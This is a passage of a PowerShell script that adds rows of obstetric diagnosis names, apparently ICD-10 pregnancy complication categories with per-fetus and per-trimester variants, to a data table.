more, second trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after intrauterine death of one fetus or more, second trimester","Continuing pregnancy after intrauterine death of one fetus or more, second trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after intrauterine death of one fetus or more, second trimester","Continuing pregnancy after intrauterine death of one fetus or more, second trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after intrauterine death of one fetus or more, third trimester","Continuing pregnancy after intrauterine death of one fetus or more, third trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after intrauterine death of one fetus or more, third trimester","Continuing pregnancy after intrauterine death of one fetus or more, third trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after intrauterine death of one fetus or more, third trimester","Continuing pregnancy after intrauterine death of one fetus or more, third trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after intrauterine death of one fetus or more, third trimester","Continuing pregnancy after intrauterine death of one fetus or more, third trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after intrauterine death of one fetus or more, third trimester","Continuing pregnancy after intrauterine death of one fetus or more, third trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after intrauterine death of one fetus or more, third trimester","Continuing pregnancy after intrauterine death of one fetus or more, third trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after intrauterine death of one fetus or more, third trimester","Continuing pregnancy after intrauterine death of one fetus or more, third trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after elective fetal reduction of one fetus or more, unspecified trimester","Continuing pregnancy after elective fetal reduction of one fetus or more, unspecified trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after elective fetal reduction of one fetus or more, unspecified trimester","Continuing pregnancy after elective fetal reduction of one fetus or more, unspecified trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after elective fetal reduction of one fetus or more, unspecified trimester","Continuing pregnancy after elective fetal reduction of one fetus or more, unspecified trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after elective fetal reduction of one fetus or more, unspecified trimester","Continuing pregnancy after elective fetal reduction of one fetus or more, unspecified trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after elective fetal reduction of one fetus or more, unspecified trimester","Continuing pregnancy after elective fetal reduction of one fetus or more, unspecified trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after elective fetal reduction of one fetus or more, unspecified trimester","Continuing pregnancy after elective fetal reduction of one fetus or more, unspecified trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after elective fetal reduction of one fetus or more, unspecified trimester","Continuing pregnancy after elective fetal reduction of one fetus or more, unspecified trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after elective fetal reduction of one fetus or more, first trimester","Continuing pregnancy after elective fetal reduction of one fetus or more, first trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after elective fetal reduction of one fetus or more, first trimester","Continuing pregnancy after elective fetal reduction of one fetus or more, first trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after elective fetal reduction of one fetus or more, first trimester","Continuing pregnancy after elective fetal reduction of one fetus or more, first trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after elective fetal reduction of one fetus or more, first trimester","Continuing pregnancy after elective fetal reduction of one fetus or more, first trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after elective fetal reduction of one fetus or more, first trimester","Continuing pregnancy after elective fetal reduction of one fetus or more, first trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after elective fetal reduction of one fetus or more, first trimester","Continuing pregnancy after elective fetal reduction of one fetus or more, first trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after elective fetal reduction of one fetus or more, first trimester","Continuing pregnancy after elective fetal reduction of one fetus or more, first trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after elective fetal reduction of one fetus or more, second trimester","Continuing pregnancy after elective fetal reduction of one fetus or more, second trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after elective fetal reduction of one fetus or more, second trimester","Continuing pregnancy after elective fetal reduction of one fetus or more, second trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after elective fetal reduction of one fetus or more, second trimester","Continuing pregnancy after elective fetal reduction of one fetus or more, second trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after elective fetal reduction of one fetus or more, second trimester","Continuing pregnancy after elective fetal reduction of one fetus or more, second trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after elective fetal reduction of one fetus or more, second trimester","Continuing pregnancy after elective fetal reduction of one fetus or more, second trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after elective fetal reduction of one fetus or more, second trimester","Continuing pregnancy after elective fetal reduction of one fetus or more, second trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after elective fetal reduction of one fetus or more, second trimester","Continuing pregnancy after elective fetal reduction of one fetus or more, second trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after elective fetal reduction of one fetus or more, third trimester","Continuing pregnancy after elective fetal reduction of one fetus or more, third trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after elective fetal reduction of one fetus or more, third trimester","Continuing pregnancy after elective fetal reduction of one fetus or more, third trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after elective fetal reduction of one fetus or more, third trimester","Continuing pregnancy after elective fetal reduction of one fetus or more, third trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after elective fetal reduction of one fetus or more, third trimester","Continuing pregnancy after elective fetal reduction of one fetus or more, third trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after elective fetal reduction of one fetus or more, third trimester","Continuing pregnancy after elective fetal reduction of one fetus or more, third trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after elective fetal reduction of one fetus or more, third trimester","Continuing pregnancy after elective fetal reduction of one fetus or more, third trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after elective fetal reduction of one fetus or more, third trimester","Continuing pregnancy after elective fetal reduction of one fetus or more, third trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Other complications specific to multiple gestation, first trimester","Other complications specific to multiple gestation, first trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Other complications specific to multiple gestation, first trimester","Other complications specific to multiple gestation, first trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Other complications specific to multiple gestation, first trimester","Other complications specific to multiple gestation, first trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Other complications specific to multiple gestation, first trimester","Other complications specific to multiple gestation, first trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Other complications specific to multiple gestation, first trimester","Other complications specific to multiple gestation, first trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Other complications specific to multiple gestation, first trimester","Other complications specific to multiple gestation, first trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Other complications specific to multiple gestation, first trimester","Other complications specific to multiple gestation, first trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Other complications specific to multiple gestation, second trimester","Other complications specific to multiple gestation, second trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Other complications specific to multiple gestation, second trimester","Other complications specific to multiple gestation, second trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Other complications specific to multiple gestation, second trimester","Other complications specific to multiple gestation, second trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Other complications specific to multiple gestation, second trimester","Other complications specific to multiple gestation, second trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Other complications specific to multiple gestation, second trimester","Other complications specific to multiple gestation, second trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Other complications specific to multiple gestation, second trimester","Other complications specific to multiple gestation, second trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Other complications specific to multiple gestation, second trimester","Other complications specific to multiple gestation, second trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Other complications specific to multiple gestation, third trimester","Other complications specific to multiple gestation, third trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Other complications specific to multiple gestation, third trimester","Other complications specific to multiple gestation, third trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Other complications specific to multiple gestation, third trimester","Other complications specific to multiple gestation, third trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Other complications specific to multiple gestation, third trimester","Other complications specific to multiple gestation, third trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Other complications specific to multiple gestation, third trimester","Other complications specific to multiple gestation, third trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Other complications specific to multiple gestation, third trimester","Other complications specific to multiple gestation, third trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Other complications specific to multiple gestation, third trimester","Other complications specific to multiple gestation, third trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Other complications specific to multiple gestation, unspecified trimester","Other complications specific to multiple gestation, unspecified trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Other complications specific to multiple gestation, unspecified trimester","Other complications specific to multiple gestation, unspecified trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Other complications specific to multiple gestation, unspecified trimester","Other complications specific to multiple gestation, unspecified trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Other complications specific to multiple gestation, unspecified trimester","Other complications specific to multiple gestation, unspecified trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Other complications specific to multiple gestation, unspecified trimester","Other complications specific to multiple gestation, unspecified trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Other complications specific to multiple gestation, unspecified trimester","Other complications specific to multiple gestation, unspecified trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Other complications specific to multiple gestation, unspecified trimester","Other complications specific to multiple gestation, unspecified trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for unstable lie","Maternal care for unstable lie, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for unstable lie","Maternal care for unstable lie, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for unstable lie","Maternal care for unstable lie, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for unstable lie","Maternal care for unstable lie, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for unstable lie","Maternal care for unstable lie, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for unstable lie","Maternal care for unstable lie, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for unstable lie","Maternal care for unstable lie, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for breech presentation","Maternal care for breech presentation, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for breech presentation","Maternal care for breech presentation, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for breech presentation","Maternal care for breech presentation, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for breech presentation","Maternal care for breech presentation, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for breech presentation","Maternal care for breech presentation, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for breech presentation","Maternal care for breech presentation, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for breech presentation","Maternal care for breech presentation, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for transverse and oblique lie","Maternal care for transverse and oblique lie, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for transverse and oblique lie","Maternal care for transverse and oblique lie, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for transverse and oblique lie","Maternal care for transverse and oblique lie, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for transverse and oblique lie","Maternal care for transverse and oblique lie, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for transverse and oblique lie","Maternal care for transverse and oblique lie, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for transverse and oblique lie","Maternal care for transverse and oblique lie, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for transverse and oblique lie","Maternal care for transverse and oblique lie, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for face, brow and chin presentation","Maternal care for face, brow and chin presentation, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for face, brow and chin presentation","Maternal care for face, brow and chin presentation, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for face, brow and chin presentation","Maternal care for face, brow and chin presentation, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for face, brow and chin presentation","Maternal care for face, brow and chin presentation, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for face, brow and chin presentation","Maternal care for face, brow and chin presentation, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for face, brow and chin presentation","Maternal care for face, brow and chin presentation, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for face, brow and chin presentation","Maternal care for face, brow and chin presentation, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for high head at term","Maternal care for high head at term, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for high head at term","Maternal care for high head at term, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for high head at term","Maternal care for high head at term, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for high head at term","Maternal care for high head at term, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for high head at term","Maternal care for high head at term, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for high head at term","Maternal care for high head at term, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for high head at term","Maternal care for high head at term, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for compound presentation","Maternal care for compound presentation, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for compound presentation","Maternal care for compound presentation, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for compound presentation","Maternal care for compound presentation, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for compound presentation","Maternal care for compound presentation, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for compound presentation","Maternal care for compound presentation, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for compound presentation","Maternal care for compound presentation, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for compound presentation","Maternal care for compound presentation, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for other malpresentation of fetus","Maternal care for other malpresentation of fetus, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for other malpresentation of fetus","Maternal care for other malpresentation of fetus, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for other malpresentation of fetus","Maternal care for other malpresentation of fetus, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for other malpresentation of fetus","Maternal care for other malpresentation of fetus, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for other malpresentation of fetus","Maternal care for other malpresentation of fetus, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for other malpresentation of fetus","Maternal care for other malpresentation of fetus, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for other malpresentation of fetus","Maternal care for other malpresentation of fetus, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for malpresentation of fetus, unspecified","Maternal care for malpresentation of fetus, unspecified, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for malpresentation of fetus, unspecified","Maternal care for malpresentation of fetus, unspecified, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for malpresentation of fetus, unspecified","Maternal care for malpresentation of fetus, unspecified, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for malpresentation of fetus, unspecified","Maternal care for malpresentation of fetus, unspecified, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for malpresentation of fetus, unspecified","Maternal care for malpresentation of fetus, unspecified, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for malpresentation of fetus, unspecified","Maternal care for malpresentation of fetus, unspecified, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for malpresentation of fetus, unspecified","Maternal care for malpresentation of fetus, unspecified, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion","Maternal care for disproportion due to deformity of maternal pelvic bones") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion","Maternal care for disproportion due to generally contracted pelvis") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion","Maternal care for disproportion due to inlet contraction of pelvis") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion due to outlet contraction of pelvis","Maternal care for disproportion due to outlet contraction of pelvis, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion due to outlet contraction of pelvis","Maternal care for disproportion due to outlet contraction of pelvis, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion due to outlet contraction of pelvis","Maternal care for disproportion due to outlet contraction of pelvis, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion due to outlet contraction of pelvis","Maternal care for disproportion due to outlet contraction of pelvis, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion due to outlet contraction of pelvis","Maternal care for disproportion due to outlet contraction of pelvis, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion due to outlet contraction of pelvis","Maternal care for disproportion due to outlet contraction of pelvis, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion due to outlet contraction of pelvis","Maternal care for disproportion due to outlet contraction of pelvis, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion of mixed maternal and fetal origin","Maternal care for disproportion of mixed maternal and fetal origin, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion of mixed maternal and fetal origin","Maternal care for disproportion of mixed maternal and fetal origin, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion of mixed maternal and fetal origin","Maternal care for disproportion of mixed maternal and fetal origin, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion of mixed maternal and fetal origin","Maternal care for disproportion of mixed maternal and fetal origin, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion of mixed maternal and fetal origin","Maternal care for disproportion of mixed maternal and fetal origin, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion of mixed maternal and fetal origin","Maternal care for disproportion of mixed maternal and fetal origin, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion of mixed maternal and fetal origin","Maternal care for disproportion of mixed maternal and fetal origin, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion due to unusually large fetus","Maternal care for disproportion due to unusually large fetus, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion due to unusually large fetus","Maternal care for disproportion due to unusually large fetus, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion due to unusually large fetus","Maternal care for disproportion due to unusually large fetus, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion due to unusually large fetus","Maternal care for disproportion due to unusually large fetus, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion due to unusually large fetus","Maternal care for disproportion due to unusually large fetus, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion due to unusually large fetus","Maternal care for disproportion due to unusually large fetus, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion due to unusually large fetus","Maternal care for disproportion due to unusually large fetus, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion due to hydrocephalic fetus","Maternal care for disproportion due to hydrocephalic fetus, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion due to hydrocephalic fetus","Maternal care for disproportion due to hydrocephalic fetus, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion due to hydrocephalic fetus","Maternal care for disproportion due to hydrocephalic fetus, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion due to hydrocephalic fetus","Maternal care for disproportion due to hydrocephalic fetus, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion due to hydrocephalic fetus","Maternal care for disproportion due to hydrocephalic fetus, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion due to hydrocephalic fetus","Maternal care for disproportion due to hydrocephalic fetus, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion due to hydrocephalic fetus","Maternal care for disproportion due to hydrocephalic fetus, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion due to other fetal deformities","Maternal care for disproportion due to other fetal deformities, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion due to other fetal deformities","Maternal care for disproportion due to other fetal deformities, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion due to other fetal deformities","Maternal care for disproportion due to other fetal deformities, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion due to other fetal deformities","Maternal care for disproportion due to other fetal deformities, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion due to other fetal deformities","Maternal care for disproportion due to other fetal deformities, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion due to other fetal deformities","Maternal care for disproportion due to other fetal deformities, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion due to other fetal deformities","Maternal care for disproportion due to other fetal deformities, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion of other origin","Maternal care for disproportion of other origin") + $null = $DiagnosisList.Rows.Add("Maternal care for disproportion, unspecified","Maternal care for disproportion, unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for congenital malformation of uterus","Maternal care for unspecified congenital malformation of uterus, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for congenital malformation of uterus","Maternal care for unspecified congenital malformation of uterus, first trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for congenital malformation of uterus","Maternal care for unspecified congenital malformation of uterus, second trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for congenital malformation of uterus","Maternal care for unspecified congenital malformation of uterus, third trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for benign tumor of corpus uteri","Maternal care for benign tumor of corpus uteri, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for benign tumor of corpus uteri","Maternal care for benign tumor of corpus uteri, first trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for benign tumor of corpus uteri","Maternal care for benign tumor of corpus uteri, second trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for benign tumor of corpus uteri","Maternal care for benign tumor of corpus uteri, third trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for scar from previous cesarean delivery","Maternal care for low transverse scar from previous cesarean delivery") + $null = $DiagnosisList.Rows.Add("Maternal care for scar from previous cesarean delivery","Maternal care for vertical scar from previous cesarean delivery") + $null = $DiagnosisList.Rows.Add("Maternal care for scar from previous cesarean delivery","Maternal care for unspecified type scar from previous cesarean delivery") + $null = $DiagnosisList.Rows.Add("Maternal care due to uterine scar from other previous surgery","Maternal care due to uterine scar from other previous surgery") + $null = $DiagnosisList.Rows.Add("Maternal care for cervical incompetence","Maternal care for cervical incompetence, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for cervical incompetence","Maternal care for cervical incompetence, first trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for cervical incompetence","Maternal care for cervical incompetence, second trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for cervical incompetence","Maternal care for cervical incompetence, third trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for other abnormalities of cervix","Maternal care for other abnormalities of cervix, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for other abnormalities of cervix","Maternal care for other abnormalities of cervix, first trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for other abnormalities of cervix","Maternal care for other abnormalities of cervix, second trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for other abnormalities of cervix","Maternal care for other abnormalities of cervix, third trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for incarceration of gravid uterus","Maternal care for incarceration of gravid uterus, first trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for incarceration of gravid uterus","Maternal care for incarceration of gravid uterus, second trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for incarceration of gravid uterus","Maternal care for incarceration of gravid uterus, third trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for incarceration of gravid uterus","Maternal care for incarceration of gravid uterus, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for prolapse of gravid uterus","Maternal care for prolapse of gravid uterus, first trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for prolapse of gravid uterus","Maternal care for prolapse of gravid uterus, second trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for prolapse of gravid uterus","Maternal care for prolapse of gravid uterus, third trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for prolapse of gravid uterus","Maternal care for prolapse of gravid uterus, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for retroversion of gravid uterus","Maternal care for retroversion of gravid uterus, first trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for retroversion of gravid uterus","Maternal care for retroversion of gravid uterus, second trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for retroversion of gravid uterus","Maternal care for retroversion of gravid uterus, third trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for retroversion of gravid uterus","Maternal care for retroversion of gravid uterus, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for other abnormalities of gravid uterus","Maternal care for other abnormalities of gravid uterus, first trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for other abnormalities of gravid uterus","Maternal care for other abnormalities of gravid uterus, second trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for other abnormalities of gravid uterus","Maternal care for other abnormalities of gravid uterus, third trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for other abnormalities of gravid uterus","Maternal care for other abnormalities of gravid uterus, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormality of vagina","Maternal care for abnormality of vagina, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormality of vagina","Maternal care for abnormality of vagina, first trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormality of vagina","Maternal care for abnormality of vagina, second trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormality of vagina","Maternal care for abnormality of vagina, third trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormality of vulva and perineum","Maternal care for abnormality of vulva and perineum, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormality of vulva and perineum","Maternal care for abnormality of vulva and perineum, first trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormality of vulva and perineum","Maternal care for abnormality of vulva and perineum, second trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormality of vulva and perineum","Maternal care for abnormality of vulva and perineum, third trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for other abnormalities of pelvic organs","Maternal care for other abnormalities of pelvic organs, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for other abnormalities of pelvic organs","Maternal care for other abnormalities of pelvic organs, first trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for other abnormalities of pelvic organs","Maternal care for other abnormalities of pelvic organs, second trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for other abnormalities of pelvic organs","Maternal care for other abnormalities of pelvic organs, third trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormality of pelvic organ, unspecified","Maternal care for abnormality of pelvic organ, unspecified, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormality of pelvic organ, unspecified","Maternal care for abnormality of pelvic organ, unspecified, first trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormality of pelvic organ, unspecified","Maternal care for abnormality of pelvic organ, unspecified, second trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormality of pelvic organ, unspecified","Maternal care for abnormality of pelvic organ, unspecified, third trimester") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) central nervous system malformation in fetus","Maternal care for (suspected) central nervous system malformation in fetus, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) central nervous system malformation in fetus","Maternal care for (suspected) central nervous system malformation in fetus, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) central nervous system malformation in fetus","Maternal care for (suspected) central nervous system malformation in fetus, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) central nervous system malformation in fetus","Maternal care for (suspected) central nervous system malformation in fetus, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) central nervous system malformation in fetus","Maternal care for (suspected) central nervous system malformation in fetus, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) central nervous system malformation in fetus","Maternal care for (suspected) central nervous system malformation in fetus, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) central nervous system malformation in fetus","Maternal care for (suspected) central nervous system malformation in fetus, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) chromosomal abnormality in fetus","Maternal care for (suspected) chromosomal abnormality in fetus, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) chromosomal abnormality in fetus","Maternal care for (suspected) chromosomal abnormality in fetus, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for (suspected) chromosomal abnormality in fetus","Maternal care for (suspected) chromosomal abnormality in 